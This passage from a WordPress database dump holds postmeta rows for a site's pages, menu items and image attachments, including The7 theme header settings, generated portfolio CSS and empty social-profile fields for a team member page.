20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27056,3671,'_menu_item_type','post_type'),
(27057,3671,'_menu_item_menu_item_parent','2084'),
(27058,3671,'_menu_item_object_id','3670'),
(27059,3671,'_menu_item_object','page'),
(27060,3671,'_menu_item_target',''),
(27061,3671,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(27062,3671,'_menu_item_xfn',''),
(27063,3671,'_menu_item_url',''),
(27064,2082,'_wp_old_date','2023-01-25'),
(27065,2083,'_wp_old_date','2023-01-25'),
(27066,2346,'_wp_old_date','2023-01-25'),
(27067,2348,'_wp_old_date','2023-01-25'),
(27068,2349,'_wp_old_date','2023-01-25'),
(27069,2350,'_wp_old_date','2023-01-25'),
(27070,2351,'_wp_old_date','2023-01-25'),
(27071,2904,'_wp_old_date','2023-01-25'),
(27072,3556,'_wp_old_date','2023-01-25'),
(27073,2084,'_wp_old_date','2023-01-25'),
(27074,2352,'_wp_old_date','2023-01-25'),
(27075,2281,'_wp_old_date','2023-01-25'),
(27076,2353,'_wp_old_date','2023-01-25'),
(27077,2354,'_wp_old_date','2023-01-25'),
(27078,2355,'_wp_old_date','2023-01-25'),
(27079,2282,'_wp_old_date','2023-01-25'),
(27080,2283,'_wp_old_date','2023-01-25'),
(27081,3645,'_wp_old_date','2023-01-25'),
(27082,2284,'_wp_old_date','2023-01-25'),
(27083,2921,'_wp_old_date','2023-01-25'),
(27084,2285,'_wp_old_date','2023-01-25'),
(27085,2356,'_wp_old_date','2023-01-25'),
(27086,2357,'_wp_old_date','2023-01-25'),
(27087,2359,'_wp_old_date','2023-01-25'),
(27088,2358,'_wp_old_date','2023-01-25'),
(27089,2286,'_wp_old_date','2023-01-25'),
(27093,3497,'_wp_page_template','default'),
(27096,3449,'_wp_page_template','default'),
(27098,3427,'_wp_page_template','default'),
(27101,3334,'_wp_page_template','default'),
(27104,3049,'rs_page_bg_color',''),
(27107,2798,'_wp_page_template','default'),
(27109,2785,'_edit_last','1'),
(27110,2785,'_wp_page_template','default'),
(27111,2785,'rs_page_bg_color',''),
(27112,2795,'_wp_page_template','default'),
(27117,3670,'the7_shortcodes_dynamic_css','a:1:{s:32:\"65e57db3767581a63f117a9e6fc34f69\";s:8906:\".portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.gradient-overlay-layout-list article {\n  border-radius: 10px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-thumbnail-wrap {\n  padding: 15px 0px 15px 0px;\n  border-radius: 10px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-thumbnail-wrap *,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-thumbnail-rollover:after {\n  border-radius: 10px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .entry-title,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-weight: bold;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69:not(.centered-layout-list) .post-entry-content {\n  padding: 25px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 10px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-65e57db3767581a63f117a9e6fc34f69 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n\";}'),
(27118,3681,'_edit_lock','1675594405:1'),
(27119,3682,'_wp_attached_file','2023/02/tutm1.jpg'),
(27120,3682,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:624;s:6:\"height\";i:416;s:4:\"file\";s:17:\"2023/02/tutm1.jpg\";s:8:\"filesize\";i:65975;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"tutm1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13169;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"tutm1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6350;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"tutm1-500x333.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26475;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27121,3681,'_thumbnail_id','3682'),
(27122,3681,'_edit_last','1'),
(27123,3681,'_wpb_vc_js_status','true'),
(27124,3681,'_dt_sidebar_position','disabled'),
(27125,3681,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27126,3681,'_dt_sidebar_hide_on_mobile','0'),
(27127,3681,'_dt_footer_show','1'),
(27128,3681,'_dt_footer_widgetarea_id','sidebar_2'),
(27129,3681,'_dt_footer_hide_on_mobile','0'),
(27130,3681,'_dt_header_title','fancy'),
(27131,3681,'_dt_header_background','normal'),
(27132,3681,'_dt_header_background_below_slideshow','disabled'),
(27133,3681,'_dt_header_transparent_bg_color_scheme','light'),
(27134,3681,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27135,3681,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27136,3681,'_dt_header_transparent_bg_color','#000000'),
(27137,3681,'_dt_header_transparent_bg_opacity','50'),
(27138,3681,'_dt_header_disabled_background','normal'),
(27139,3681,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27140,3681,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27141,3681,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27142,3681,'_dt_header_disabled_transparent_bg_color','#000000'),
(27143,3681,'_dt_header_disabled_transparent_bg_opacity','50'),
(27144,3681,'_dt_page_overrides_top_margin',''),
(27145,3681,'_dt_page_overrides_right_margin',''),
(27146,3681,'_dt_page_overrides_bottom_margin',''),
(27147,3681,'_dt_page_overrides_left_margin',''),
(27148,3681,'_dt_mobile_page_padding_top',''),
(27149,3681,'_dt_mobile_page_padding_right',''),
(27150,3681,'_dt_mobile_page_padding_bottom',''),
(27151,3681,'_dt_mobile_page_padding_left',''),
(27152,3681,'_dt_fancy_header_layout_heading',''),
(27153,3681,'_dt_fancy_header_title_aligment','left'),
(27154,3681,'_dt_fancy_header_height','300'),
(27155,3681,'_dt_fancy_header_padding-top','0px'),
(27156,3681,'_dt_fancy_header_padding-bottom','0px'),
(27157,3681,'_dt_fancy_header_breadcrumbs_heading',''),
(27158,3681,'_dt_fancy_header_breadcrumbs','disabled'),
(27159,3681,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27160,3681,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27161,3681,'_dt_fancy_header_title_heading',''),
(27162,3681,'_dt_fancy_header_title_mode','custom'),
(27163,3681,'_dt_fancy_header_title',''),
(27164,3681,'_dt_fancy_header_title_font_size','30'),
(27165,3681,'_dt_fancy_header_title_line_height','36'),
(27166,3681,'_dt_fancy_header_text_transform','none'),
(27167,3681,'_dt_fancy_header_title_color_mode','color'),
(27168,3681,'_dt_fancy_header_title_color','#f4e916'),
(27169,3681,'_dt_fancy_header_subtitle_heading',''),
(27170,3681,'_dt_fancy_header_subtitle',''),
(27171,3681,'_dt_fancy_header_subtitle_font_size','18'),
(27172,3681,'_dt_fancy_header_subtitle_line_height','26'),
(27173,3681,'_dt_fancy_header_subtitle_text_transform','none'),
(27174,3681,'_dt_fancy_header_subtitle_color_mode','color'),
(27175,3681,'_dt_fancy_header_subtitle_color','#ffffff'),
(27176,3681,'_dt_fancy_header_bg_heading',''),
(27177,3681,'_dt_fancy_header_bg_color','#222222'),
(27178,3681,'_dt_fancy_header_bg_image_origin','featured_image'),
(27179,3681,'_dt_fancy_header_bg_image','a:0:{}'),
(27180,3681,'_dt_fancy_header_bg_repeat','no-repeat'),
(27181,3681,'_dt_fancy_header_bg_position_x','center'),
(27182,3681,'_dt_fancy_header_bg_position_y','center'),
(27183,3681,'_dt_fancy_header_bg_fullscreen','1'),
(27184,3681,'_dt_fancy_header_bg_overlay','0'),
(27185,3681,'_dt_fancy_header_overlay_color','#000'),
(27186,3681,'_dt_fancy_header_bg_overlay_opacity','50'),
(27187,3681,'_dt_fancy_header_scroll_effect','default'),
(27188,3681,'_dt_fancy_header_bg_parallax','0.5'),
(27189,3681,'_dt_fancy_header_responsiveness_heading',''),
(27190,3681,'_dt_fancy_header_responsiveness','disabled'),
(27191,3681,'_dt_fancy_header_responsiveness_switch','778px'),
(27192,3681,'_dt_fancy_header_responsive_height','70'),
(27193,3681,'_dt_fancy_header_responsive_font_size','30'),
(27194,3681,'_dt_fancy_header_responsive_title_line_height','38'),
(27195,3681,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27196,3681,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27197,3681,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27198,3681,'_dt_project_options_back_button',''),
(27199,3681,'_dt_project_options_show_link',''),
(27200,3681,'_dt_project_options_link',''),
(27201,3681,'_dt_project_options_link_target',''),
(27202,3681,'_dt_project_options_link_name',''),
(27203,3681,'_dt_project_options_hide_thumbnail','1'),
(27204,3681,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(27205,3681,'_dt_project_options_related_mode','same'),
(27206,3681,'_dt_project_options_preview','normal'),
(27207,3681,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/02/tutm1.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #f4e916;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27208,3685,'_wp_attached_file','2023/02/tutm2.jpg'),
(27209,3685,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:624;s:6:\"height\";i:373;s:4:\"file\";s:17:\"2023/02/tutm2.jpg\";s:8:\"filesize\";i:105602;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"tutm2-300x179.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18183;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"tutm2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10611;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"tutm2-500x299.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:299;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41060;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27210,3688,'_edit_lock','1675730983:1'),
(27211,3688,'_edit_last','1'),
(27212,3688,'_dt_sidebar_position','disabled'),
(27213,3688,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27214,3688,'_dt_sidebar_hide_on_mobile','0'),
(27215,3688,'_dt_footer_show','1'),
(27216,3688,'_dt_footer_widgetarea_id','sidebar_2'),
(27217,3688,'_dt_footer_hide_on_mobile','0'),
(27218,3688,'_dt_header_title','fancy'),
(27219,3688,'_dt_header_background','normal'),
(27220,3688,'_dt_header_background_below_slideshow','disabled'),
(27221,3688,'_dt_header_transparent_bg_color_scheme','light'),
(27222,3688,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27223,3688,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27224,3688,'_dt_header_transparent_bg_color','#000000'),
(27225,3688,'_dt_header_transparent_bg_opacity','50'),
(27226,3688,'_dt_header_disabled_background','normal'),
(27227,3688,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27228,3688,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27229,3688,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27230,3688,'_dt_header_disabled_transparent_bg_color','#000000'),
(27231,3688,'_dt_header_disabled_transparent_bg_opacity','50'),
(27232,3688,'_dt_page_overrides_top_margin',''),
(27233,3688,'_dt_page_overrides_right_margin',''),
(27234,3688,'_dt_page_overrides_bottom_margin',''),
(27235,3688,'_dt_page_overrides_left_margin',''),
(27236,3688,'_dt_mobile_page_padding_top',''),
(27237,3688,'_dt_mobile_page_padding_right',''),
(27238,3688,'_dt_mobile_page_padding_bottom',''),
(27239,3688,'_dt_mobile_page_padding_left',''),
(27240,3688,'_dt_fancy_header_layout_heading',''),
(27241,3688,'_dt_fancy_header_title_aligment','center'),
(27242,3688,'_dt_fancy_header_height','300'),
(27243,3688,'_dt_fancy_header_padding-top','0px'),
(27244,3688,'_dt_fancy_header_padding-bottom','0px'),
(27245,3688,'_dt_fancy_header_breadcrumbs_heading',''),
(27246,3688,'_dt_fancy_header_breadcrumbs','disabled'),
(27247,3688,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27248,3688,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27249,3688,'_dt_fancy_header_title_heading',''),
(27250,3688,'_dt_fancy_header_title_mode','custom'),
(27251,3688,'_dt_fancy_header_title','Sameer Saran'),
(27252,3688,'_dt_fancy_header_title_font_size','30'),
(27253,3688,'_dt_fancy_header_title_line_height','36'),
(27254,3688,'_dt_fancy_header_text_transform','none'),
(27255,3688,'_dt_fancy_header_title_color_mode','color'),
(27256,3688,'_dt_fancy_header_title_color','#ffffff'),
(27257,3688,'_dt_fancy_header_subtitle_heading',''),
(27258,3688,'_dt_fancy_header_subtitle',''),
(27259,3688,'_dt_fancy_header_subtitle_font_size','18'),
(27260,3688,'_dt_fancy_header_subtitle_line_height','26'),
(27261,3688,'_dt_fancy_header_subtitle_text_transform','none'),
(27262,3688,'_dt_fancy_header_subtitle_color_mode','color'),
(27263,3688,'_dt_fancy_header_subtitle_color','#ffffff'),
(27264,3688,'_dt_fancy_header_bg_heading',''),
(27265,3688,'_dt_fancy_header_bg_color','#222222'),
(27266,3688,'_dt_fancy_header_bg_image_origin','custom'),
(27267,3688,'_dt_fancy_header_bg_image','a:0:{}'),
(27268,3688,'_dt_fancy_header_bg_repeat','no-repeat'),
(27269,3688,'_dt_fancy_header_bg_position_x','center'),
(27270,3688,'_dt_fancy_header_bg_position_y','center'),
(27271,3688,'_dt_fancy_header_bg_fullscreen','1'),
(27272,3688,'_dt_fancy_header_bg_overlay','0'),
(27273,3688,'_dt_fancy_header_overlay_color','#000'),
(27274,3688,'_dt_fancy_header_bg_overlay_opacity','50'),
(27275,3688,'_dt_fancy_header_scroll_effect','default'),
(27276,3688,'_dt_fancy_header_bg_parallax','0.5'),
(27277,3688,'_dt_fancy_header_responsiveness_heading',''),
(27278,3688,'_dt_fancy_header_responsiveness','disabled'),
(27279,3688,'_dt_fancy_header_responsiveness_switch','778px'),
(27280,3688,'_dt_fancy_header_responsive_height','70'),
(27281,3688,'_dt_fancy_header_responsive_font_size','30'),
(27282,3688,'_dt_fancy_header_responsive_title_line_height','38'),
(27283,3688,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27284,3688,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27285,3688,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27286,3688,'_dt_teammate_options_go_to_single','1'),
(27287,3688,'_dt_teammate_options_position',''),
(27288,3688,'_dt_teammate_options_website',''),
(27289,3688,'_dt_teammate_options_mail',''),
(27290,3688,'_dt_teammate_options_facebook',''),
(27291,3688,'_dt_teammate_options_twitter',''),
(27292,3688,'_dt_teammate_options_dribbble',''),
(27293,3688,'_dt_teammate_options_you-tube',''),
(27294,3688,'_dt_teammate_options_rss',''),
(27295,3688,'_dt_teammate_options_delicious',''),
(27296,3688,'_dt_teammate_options_flickr',''),
(27297,3688,'_dt_teammate_options_lastfm',''),
(27298,3688,'_dt_teammate_options_linkedin',''),
(27299,3688,'_dt_teammate_options_vimeo',''),
(27300,3688,'_dt_teammate_options_tumbler',''),
(27301,3688,'_dt_teammate_options_pinterest',''),
(27302,3688,'_dt_teammate_options_devian',''),
(27303,3688,'_dt_teammate_options_skype',''),
(27304,3688,'_dt_teammate_options_github',''),
(27305,3688,'_dt_teammate_options_instagram',''),
(27306,3688,'_dt_teammate_options_stumbleupon',''),
(27307,3688,'_dt_teammate_options_behance',''),
(27308,3688,'_dt_teammate_options_px-500',''),
(27309,3688,'_dt_teammate_options_tripedvisor',''),
(27310,3688,'_dt_teammate_options_vk',''),
(27311,3688,'_dt_teammate_options_foursquare',''),
(27312,3688,'_dt_teammate_options_xing',''),
(27313,3688,'_dt_teammate_options_weibo',''),
(27314,3688,'_dt_teammate_options_odnoklassniki',''),
(27315,3688,'_dt_teammate_options_research-gate',''),
(27316,3688,'_dt_teammate_options_yelp',''),
(27317,3688,'_dt_teammate_options_blogger',''),
(27318,3688,'_dt_teammate_options_soundcloud',''),
(27319,3688,'_dt_teammate_options_viber',''),
(27320,3688,'_dt_teammate_options_whatsapp',''),
(27321,3688,'_dt_teammate_options_reddit',''),
(27322,3688,'_dt_teammate_options_snapchat',''),
(27323,3688,'_dt_teammate_options_telegram',''),
